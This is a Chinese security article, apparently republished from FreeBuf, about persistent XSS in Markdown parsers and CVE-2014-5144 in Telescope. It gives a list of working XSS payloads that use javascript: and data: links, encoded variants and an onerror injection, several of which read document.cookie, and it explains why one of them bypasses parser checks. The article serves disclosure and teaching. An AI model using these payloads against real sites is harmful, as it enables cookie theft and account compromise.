CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

5144free

2017年5月22日 984点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

Conermx2015-02-10+6共131391人围观 ,发现 6 个不明物体WEB安全

FreeBuf科普:什么是Markdown?

Markdown是一种轻量级的标记语言,流行程度已经得到了GitHub和Stack Overflow的广泛支持,作为普通人我们也可以轻松上手。

用markdown来写文章非常赞,那些琐碎的HTML标签都可以抛到脑后不用管。最近5年内,markdown收到非常多的关注,包括Reddit,Github,StackOverflow在内的很多应用都使用 markdown这也催生了很多的markdown解析器的产生,这里定义了一些markdown语法,语法约定markdown解析器将这些标签解析为html标签。

Markdown安全现状

Markdow解析器的安全现状如何?有没有对用户输入的数据做过滤?

事实上,很多markdown解析器都没有过滤用户输入的数据,那么如果markdown被用于添加用户评论等功能的时候,就有可能存在安全风险。

这里有一些关于这个问题的讨论:[1], [2], [3].

另外,如果用googe搜索一下:

markdown xss issue site:github.com

你就会发现github上又很多星级很高的项目都被发现存在XSS 漏洞。

所以,如何构造一些payload呢?看下面这些:

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)> 
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a&#039;"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)

上面这些payload是由Aleksa和原文作者一起搞出来的。在过去的12个月内,在实际渗透测试中证明,上面的这些 payload 是有效的。并且很多 markdown 解析器都受到影响。来看一下最后一个payload:

[test](javascript://%0d%0aprompt(1);com)

我们猜测,markdown 解析器可能通过如下几个步骤来进行解析&转换:

1、判断时候有协议头?//有javascript 伪协议,Y
2、hostname 是以常见的域名后缀(com, org)结尾的?//是的,以 com 结尾 Y
3、将上述 payload 转换为 HTML 标签,//结果如下

<a href="javascript://%0d%0aprompt(1);com>test</a>

成功构造了一个XSS payload!当点击了上述链接后,就会触发XSS!

Telescope解析器一个持久性 XSS 漏洞(CVE-2014-5144)

Telescope是一个有名的开源项目,类似Reddit和Hackernews一样,提供一个社区功能。Telescope的一个解析帖子&评论的功能存在 XSS 漏洞,并且这个功能存在很久了!

在0.9.3之前的版本中,以上面的 payload 列表中的 payload 发帖或者发表评论,就可以导致一个XSS漏洞。该漏洞已经修复,Telescope在这里发了changelog:http://www.telesc.pe/blog/telescope-v093-dailyscope/

下面是漏洞对应的payload:

[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

注意:上述漏洞已经在Telescope >= 0.7.3版本中修复了。

如果你发现了新的payload ,可以在这里提交给我们。

[参考来源shubh.am,转载请注明来自Freebuf黑客与极客(FreeBuf.COM)]

Conermx17 篇文章等级: 5级
|
|
  • 上一篇:多步CSRF漏洞场景及其利用
  • 下一篇:多家知名连锁酒店、高端品牌酒店存在严重安全漏洞,海量开房信息存泄露风险
发表评论

已有 6 条评论

  • hellowordl 2015-02-10回复1楼

    左上角的deleteddeleted是什么?

    亮了(2)
    • 夜尽天明 (5级)千秋邈矣独留我,百战归来再读书 2015-02-10回复

      @ hellowordl 左上角?没发现异常,,难道我眼瞎

      亮了(1)
  • deleteddeleted 2015-02-10回复2楼

    deleteddeleted

    亮了(1)
  • deleteddeleted 2015-02-10回复3楼

    我黑了bf,不信看左上角。 :)

    亮了(3)
  • 妹特丝棒慰 2015-02-10回复4楼

    颜射KFMM

    亮了(1)
  • Helixcs 2015-02-10回复5楼

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

Conermx

这家伙太懒,还未填写个人描述!

17 篇文章8 条评论

相关阅读

  • [技术解析]一份Archmake.COM的渗透测试报告
  • [Paper]Web漏洞实战教程(DVWA的使用和漏洞分析)PDF下载
  • Web应用安全十大主动安全措施
  • 又一钓鱼经典案列分析
  • 关于PHP代码审计和漏洞挖掘的一点思考

特别推荐

关注我们 分享每日精选文章

不容错过

  • FB视频:纪录片《暗网》之勒索软件篇FB视频2016-04-02
  • 只用一个WiFi,渗透进企业全部内网360天巡实验室2016-06-22
  • 【原创连载小说】《杀手》第一章:网络杀手kill472017-03-18
  • 又是雅虎,又10亿账户泄露!论数据泄露谁与争锋孙毛毛2016-12-15

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0day

标签: 暂无
最后更新:2017年5月22日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me